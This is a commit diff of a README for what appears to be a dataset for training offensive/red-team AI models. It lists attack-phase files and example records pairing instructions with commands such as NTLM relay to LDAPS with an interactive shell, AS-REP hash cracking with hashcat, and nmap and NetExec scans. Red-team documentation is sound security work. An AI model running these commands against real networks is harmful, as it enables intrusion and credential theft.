elementalsouls commited on
Commit
194e1fd
·
verified ·
1 Parent(s): 9056935

Update README.md

Browse files
Files changed (1) hide show
  1. README.md +4 -34
README.md CHANGED
@@ -8,28 +8,6 @@ A comprehensive dataset for training, benchmarking, and documenting offensive/re
8
  - `datasets/schema/record.schema.json` — Canonical schema for dataset records.
9
  - `datasets/*.jsonl` — Task-specific datasets, each line is a JSON object.
10
 
11
- ### Dataset Files
12
-
13
- - `discovery.jsonl` — Host/service/AD enumeration.
14
- - `initial_access.jsonl` — Phishing, exploitation, rogue device.
15
- - `privilege_escalation.jsonl` — Escalation, ACL/service attacks.
16
- - `credential_access.jsonl` — Dumping, cracking, relay, credential stores.
17
- - `lateral_movement.jsonl` — SMB, WinRM, Kerberos, cloud movement.
18
- - `persistence.jsonl` — Golden/silver tickets, scheduled tasks, backdoors.
19
- - `collection_exfil.jsonl` — Data staging, compression, exfiltration.
20
- - `c2.jsonl` — C2 infra, beacons, tunneling.
21
- - `impact.jsonl` — Ransomware, destruction, shadow copy removal.
22
- - `evasion.jsonl` — AV/EDR bypass, obfuscation, log tampering.
23
- - `cloud_hybrid.jsonl` — Azure, Entra ID, O365, hybrid pivots.
24
- - `tool_glossary.jsonl` — Tool descriptions, usage scenarios, command syntax.
25
- - `chain_operations_examples.jsonl` — Multi-step attack chains/playbooks.
26
- - `error_handling.jsonl` — Failure modes, fallbacks.
27
- - `advanced_techniques.jsonl` — Latest CVEs, novel chaining, new exploits.
28
- - `decision_matrix.jsonl` — When to use which technique; risk/noise comparisons.
29
-
30
- ## Schema
31
-
32
- See [`datasets/schema/record.schema.json`](schema/record.schema.json) for full field list (instruction, input, output, meta).
33
 
34
  ## Usage
35
 
@@ -39,16 +17,8 @@ See [`datasets/schema/record.schema.json`](schema/record.schema.json) for full f
39
  ## Example Record
40
 
41
  ```json
42
- {
43
- "instruction": "Describe lateral movement using PsExec.",
44
- "input": "psexec.py <domain>/<user>:<password>@<target_ip>",
45
- "output": "Executes commands on remote host via SMB using provided credentials.",
46
- "meta": {
47
- "phase": "lateral_movement",
48
- "required_privilege": "admin on target",
49
- "risk_level": "high",
50
- "references": ["https://github.com/fortra/impacket"],
51
- "year": "2024"
52
- }
53
- }
54
  ```
 
8
  - `datasets/schema/record.schema.json` — Canonical schema for dataset records.
9
  - `datasets/*.jsonl` — Task-specific datasets, each line is a JSON object.
10
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
11
 
12
  ## Usage
13
 
 
17
  ## Example Record
18
 
19
  ```json
20
+ {"instruction": "Scan Network", "input": "nxc smb <ip_range>", "output": "NetExec-like tool invocation for SMB/LDAP/MSSQL and other probes."}
21
+ {"instruction": "NTLM relay > To LDAP(S)", "input": "ntlmrelayx.py -t ldaps://<dc_ip> --remove-mic -smb2support --interactive # connect to ldap_shell with nc 127.0.0.1 10111 #LDAP SHELL", "output": "Note or procedural step under 'NTLM relay > To LDAP(S)'."}
22
+ {"instruction": "Scan Network", "input": "nmap -Pn -sC -sV -p- -oA <output> <ip>", "output": "Network/service scan or enumeration command (Nmap) with specified options."}
23
+ {"instruction": "Kerberos ASREP ($krb5asrep$23...)", "input": "hashcat -m 18200 -a 0 hash.txt <rockyou.txt>", "output": "Tool or command referenced under 'Kerberos ASREP ($krb5asrep$23...)'."}
 
 
 
 
 
 
 
 
24
  ```